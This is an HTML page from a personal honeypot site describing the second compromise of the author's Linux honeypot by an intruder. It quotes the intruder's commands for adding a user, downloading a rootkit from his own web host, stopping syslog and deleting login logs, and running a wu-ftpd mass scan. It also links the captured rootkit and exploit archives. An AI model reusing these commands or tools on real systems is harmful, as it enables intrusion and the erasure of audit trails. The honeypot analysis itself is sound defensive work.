<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><script language="JavaScript" src="javascript/honeypot.js" type="text/javascript"></script>
<title>My honeypot</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="stylesheets/honeypot.css" rel="stylesheet" type="text/css">
</head>

<body>
<img src="images/poohhoney3.gif" width="60" height="92" align="left" alt=""> 
<div align="center">
  <table width="80%" border="0" class="titlebar">
    <!--DWLayoutTable-->
<tr> 
      <td width="16%" onMouseOver="titleover(this)" onMouseOut="titleout(this)"><div align="center"><a href="index.html" class="titlebarlink">Introduction</a></div></td>
      <td width="16%" onMouseOver="titleover(this)" onMouseOut="titleout(this)"><div align="center"><a href="setup.html" class="titlebarlink">Setup</a></div></td>
      <td width="16%" onMouseOver="titleover(this)" onMouseOut="titleout(this)"><div align="center"><a href="hacks.html" class="titlebarlink">Hacks</a></div></td>
      <td width="16%" onMouseOver="titleover(this)" onMouseOut="titleout(this)"><div align="center"><a href="files.html" class="titlebarlink">Files</a></div></td>
	  <td width="16%" onMouseOver="titleover(this)" onMouseOut="titleout(this)"><div align="center"><a href="links.html" class="titlebarlink">Links</a></div></td>
      <td width="16%" onMouseOver="titleover(this)" onMouseOut="titleout(this)"><div align="center"><a href="react.php" class="titlebarlink">React</a></div></td>
    </tr>
  </table>

  <table width="80%" border="0" cellpadding="10" class="maintable">
    <tr> 
      <td> <div align="center"> <br><font size="4">MiCrobul</font></div>
        
      <p align="justify">A few days after the honeypot got cracked something strange 
        happened. It got cracked again :) Apparently our dear MASTER-0N didn't 
        close the hole. Although he echoed &quot;anonymous&quot; into /etc/users 
        and /etc/ftpusers. After pulling the box down I found /etc/users isn't 
        there and there's no &quot;anonymous&quot; in /etc/ftpusers. I really 
        have no clue why though.. <strong>Update: </strong><em>I now know why: 
        apparently MASTER-0N was using a script for installing his rootkit which 
        had commentsigns '#' in front of the echo's, didn't notice them in the 
        distorted telnet logs snort made at that time.</em> </p>
      <p align="justify">Anyway.. the hole wasn't closed. So it wouldn't take 
        long before somebody would stop by and try again. It happened on June 
        22th, at 03:42. After gaining a root-shell the user 'tcp' was created. 
      </p>
      <p align="justify"><em><font color="#0000A0">/usr/sbin/adduser tcp<br>
        /usr/bin/passwd tcp<br>
        xxxxxxxx<br>
        xxxxxxxx<br>
        Changing password for user tcp<br>
        passwd: all authentication tokens updated successfully</font></em></p>
      <p align="justify">After that 'mrk.tgz' was downloaded from microbul.home.ro, 
        extracted and installed using './install'. Get it <a href="files/mrk.tgz">here</a>. 
        This file contains altered 'ps', 'top', 'ifconfig' and 'netstat' binaries, 
        a sniffer, a cgi-binary, an install script, a log-cleaning script and 
        a backdoor sshd. Take a look at <a href="http://project.honeynet.org/scans/scan13/som/som18.txt">http://project.honeynet.org/scans/scan13/som/som18.txt</a> 
        or <a href="http://project.honeynet.org/scans/scan13/som/som17.txt">som17.txt</a> 
        for more information about the rootkit. The installed sshd is started 
        and MiCrobul logs in at 03:44. </p>
      <p align="justify">First MiCrobul checks if there's not somebody other than 
        him logged in.</p>
      <p align="justify"><font color="#0000A0"><em>[root@hostname mtr]# w<br>
        3:44am up 153 days, 11:59, 2 users, load average: 0.00, 0.00, 0.00<br>
        USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT<br>
        tcp ttyp0 194.176.177.53 3:40am 3:59 0.04s ? -<br>
        </em> </font> </p>
      <p align="justify">No problem. Then he checks for listening daemons. Something 
        weird shows up, a daemon listening on port 50001. The listener on port 
        2128 is his own sshd. Port 98 is linuxconf. </p>
      <p align="justify"><em><font color="#0000A0">[root@hostname mtr]# netstat 
        -an | grep LIST<br>
        tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN <br>
        tcp 0 0 0.0.0.0:98 0.0.0.0:* LISTEN <br>
        tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN <br>
        tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN <br>
        tcp 0 0 0.0.0.0:50001 0.0.0.0:* LISTEN <br>
        tcp 0 0 0.0.0.0:2128 0.0.0.0:* LISTEN </font></em><br>
      </p>
      <p align="justify">Now let's check which process is using that socket and 
        kill it. </p>
      <p align="justify"><em><font color="#0000A0">[root@hostname mtr]# /sbin/fuser 
        -n tcp 50001<br>
        50001/tcp: 10962<br>
        [root@hostname mtr]# kill -9 10962 </font></em></p>
      <p align="justify">Every person needs his social contacts, so why not download 
        psy? Unlike MASTER-0N MiCrobul doesn't waste his private webspace for 
        a copy of psybnc. Instead he uses efnet.org's copy. </p>
      <p align="justify"><em><font color="#0000A0">[root@hostname mtr]# lynx http://www.efnet.org/software/bouncers/psybnc/psyBNC2.2.2.tar.gz</font></em></p>
      <p align="justify">After untarring, building and configuring (he uses pico 
        as editor) the pybnc binary is started. A check is done to see if it runs:</p>
      <p align="justify"><em><font color="#0000A0">[root@hostname psybnc]# netstat 
        -an | grep LIST<br>
        tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN <br>
        tcp 0 0 0.0.0.0:2128 0.0.0.0:* LISTEN <br>
        tcp 0 0 0.0.0.0:2129 0.0.0.0:* LISTEN <br>
        </font> </em> </p>
      <p align="justify">Lo and behold, a process listening on port 2129, it's 
        psy. For your pleasure here's the commands MiCrobul ran this session.</p>
      <p align="justify"><em><font color="#0000A0">w<br>
        netstat -an | grep LIST<br>
        /sbin/fuser -n tcp 50001<br>
        ps ax<br>
        kill -9 10962<br>
        netstat -an | grep LIST<br>
        /sbin/fuser -n tcp 21<br>
        kill -9 368<br>
        netstat -an | grep LIST<br>
        wget http://www.efnet.org/software/bouncers/psybnc/psyBNC2.2.2.tar.gz<br>
        lynx http://www.efnet.org/software/bouncers/psybnc/psyBNC2.2.2.tar.gz<br>
        ls<br>
        tar zxvf psyBNC2.2.2.tar.gz<br>
        ls<br>
        rm -rf psyBNC2.2.2.tar.gz<br>
        ls<br>
        /etc/rc.d/init.d/syslog stop<br>
        cd var/log<br>
        cd ..<br>
        cd ll<br>
        cd ..<br>
        ls<br>
        cd var<br>
        cd log<br>
        ls<br>
        rm -rf lastlog wtmp.1<br>
        ls<br>
        cd /home<br>
        ls<br>
        cd mtr<br>
        ls<br>
        cd psybnc<br>
        ls<br>
        make<br>
        ls<br>
        pico psybnc.conf <br>
        ./psybnc<br>
        netstat -an | grep LIST<br>
        clear<br>
        cd ..<br>
        ls<br>
        cd ..<br>
        ls<br>
        </font></em> </p>
      <p align="justify">At 04.00 MiCrobul comes in again, just to check if there's 
        anyone logged in. </p>
      <p align="justify"><font color="#0000A0"><em>Bash started on Sat Jun 22 
        04:00:33 2002<br>
        [root@hostname mtr]# w<br>
        4:00am up 153 days, 12:15, 1 user, load average: 0.00, 0.00, 0.00<br>
        USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT<br>
        [root@hostname mtr]# </em></font></p>
      <p align="justify">That same afternoon, at 14:28 MiCrobul logs in again. 
        Let's see what he did.</p>
      <p align="justify"><font color="#0000A0"><em>[root@hostname mtr]# w<br>
        2:28pm up 154 days, 22:43, 1 user, load average: 0.00, 0.00, 0.00<br>
        USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT<br>
        [root@hostname mtr]# last<br>
        last: /var/log/wtmp: No such file or directory<br>
        Perhaps this file was removed by the operator to prevent logging last 
        info.<br>
        [root@hostname mtr]# /usr/tcp/ftp<br>
        bash: /usr/tcp/ftp: No such file or directory<br>
        [root@hostname mtr]# cd ..<br>
        [root@hostname /home]# cd ..<br>
        [root@hostname /]# cd usr<br>
        [root@hostname /usr]# mkdir tcp<br>
        [root@hostname /usr]# ftp<br>
        ftp&gt; o<br>
        (to) microbul.home.ro<br>
        Connected to microbul.home.ro.<br>
        220 Home.ro Members FTP<br>
        Name (microbul.home.ro:admin): microbul<br>
        331 Password required for microbul.<br>
        Password:<br>
        230 User microbul logged in.<br>
        Remote system type is UNIX.<br>
        Using binary mode to transfer files.<br>
        ftp&gt; ls<br>
        ...</em></font></p>
      <p align="justify">Ok.. first he checks if there is or has been somebody 
        online. Since I let the box alone nothing shows up (I deleted the wtmp 
        file before putting the box online) and MiCrobul continues. It seems /usr/tcp/ftp 
        is his default storage directory for evil tools. Because the directory 
        is nonexistant, he creates it and ftp's in on his webspace at home.ro. 
        Let's see what's stored there.</p>
      <p align="justify"><em><font color="#0000A0">drwx------ 2 free web 22 Apr 
        8 2001 _private<br>
        drwxr-xr-x 4 free web 52 Apr 8 2001 _vti_bin<br>
        drwxr-xr-x 2 free web 22 Jun 9 2001 _vti_cnf<br>
        drwxr-xr-x 2 free web 22 Apr 8 2001 _vti_log<br>
        drwxr-xr-x 2 free web 4096 Jun 9 2001 _vti_pvt<br>
        drwxr-xr-x 2 free web 22 Jun 9 2001 _vti_txt<br>
        -rw-r--r-- 1 free web 187603 Jun 5 21:21 ftp.tgz<br>
        -rw-r--r-- 1 free web 177063 Jun 20 22:05 mbk.tgz<br>
        -rw-r--r-- 1 free web 177030 Jun 22 01:05 mrk.tgz<br>
        -rw-r--r-- 1 free web 15755 May 27 23:19 scan<br>
        -rw-r--r-- 1 free web 45920 Jun 1 06:05 ssh3.tar.gz<br>
        -rw-r--r-- 1 free web 223144 Apr 23 21:19 x4.tgz<br>
        -rw-r--r-- 1 free web 4305 Jun 5 23:50 x6.tgz<br>
        </font></em> </p>
      <p align="justify">Besides some MS Frontpage (TM) (R) (C) (etc) crap there's 
        some gzipped tars too, mrk.tgz probably being <strong>M</strong>iCrobul 
        <strong>R</strong>oot<strong>K</strong>it, whereas mbk.tgz is a backup. 
        x4 and x6 are exploits for the OpenSSH deattack.c bug. I've seen x2, x3, 
        x4 and x6 in the wild now, what about x1 and x5? (<strong>Update</strong>: 
        <em>x6 is backdoored and sends the system information of the system it 
        runs on to the creator via e-mail</em>.)</p>
      <p align="justify">MiCrobul grabs the ftp.tgz file, which you can get <a href="files/ftp.tgz">here</a>. 
        The file contains:</p>
      <p align="justify"><em><font color="#0000A0">[root@hostname tcp]# tar zxvf 
        ftp.tgz<br>
        ftp/<br>
        ftp/awu<br>
        ftp/7350wurm<br>
        ftp/luckscan-a.c<br>
        ftp/scan</font></em><br>
      </p>
      <p align="justify">These are scanning and exploiting tools for wu-ftpd, 
        by which my Honeypot got found and cracked too. MiCrobul begins scanning 
        some networks:</p>
      <p align="justify"><font color="#0000A0"><em>[root@hostname ftp]# ./scan 
        209 21 239 41 1<br>
        Lets try to root the 209.239.41.1<br>
        Checking 209.239.41.1 for vulnerable wu-ftpd 2.x &lt; 2.6.2: failed<br>
        We continue to hack ...<br>
        Lets try to root the 209.239.44.240<br>
        Checking 209.239.44.240 for vulnerable wu-ftpd 2.x &lt; 2.6.2: failed<br>
        We continue to hack ...<br>
        Lets try to root the 209.239.49.111<br>
        Checking 209.239.49.111 for vulnerable wu-ftpd 2.x &lt; 2.6.2: failed<br>
        We continue to hack ...<br>
        Lets try to root the 209.239.52.196<br>
        Checking 209.239.52.196 for vulnerable wu-ftpd 2.x &lt; 2.6.2: failed<br>
        We continue to hack ...<br>
        Lets try to root the 209.239.56.204<br>
        Checking 209.239.56.204 for vulnerable wu-ftpd 2.x &lt; 2.6.2: failed<br>
        We continue to hack ...<br>
        Lets try to root the 209.239.60.170<br>
        Checking 209.239.60.170 for vulnerable wu-ftpd 2.x &lt; 2.6.2: failed<br>
        We continue to hack ...<br>
        Lets try to root the 209.239.76.134<br>
        Checking 209.239.76.134 for vulnerable wu-ftpd 2.x &lt; 2.6.2: failed<br>
        We continue to hack ...<br>
        </em></font></p>
      <p align="justify">What MiCrobu didn't know was that although he was scanning 
        with about 30KByte/s, outgoing TCP SYN packets were limited to 2KByte 
        per second, and because I noticed he was scanning even to a few bytes/sec. 
        His scan couldn't get far. While tcpdumping behind the limiter I found 
        that there were only a few packets per C-class going to the internet, 
        nice :) </p>
      <p align="justify">At June 25th MiCrobul logged in again to scan a few more 
        networks. The first few scans I didn't notice, since I was having lunch, 
        but I monitored him during the rest of the scans. I fiddled a bit with 
        the limiter to limit all outgoing TCP SYN's on port 21 or to let a few 
        byte/s through to avoid raising suspicioun. Problem was, he could find 
        out he was being limited. That and the fact that he wasn't doing anything 
        interesting I hadn't seen/logged made me firewall the box, effectively 
        disconnecting it from the internet. </p>
      <p align="justify">&nbsp;</p>
      <p align="justify">Well.. this is it. My first honeypot. To me it was a 
        relative success. Last time I was involved with such a project I was able 
        to track down a stacheldraht ddos-network and a botnet. By mailing admins 
        I was able to weaken the ddos-network and disconnect half the botnet. 
        This time both the kiddo's didn't seem to have a ddos-net nor a botnet. 
        MASTER-ON only installed a IRC-bouncer, MiCrobul only used my honeypot 
        as a scanning platform. Perhaps next time better, although I could always 
        trojanize MiCrobul's rootkit to have my fun >;)<br>
      </p>
      <p> 
      </p>
      </td>
</tr>
</table>
</div>
</body>
</html>
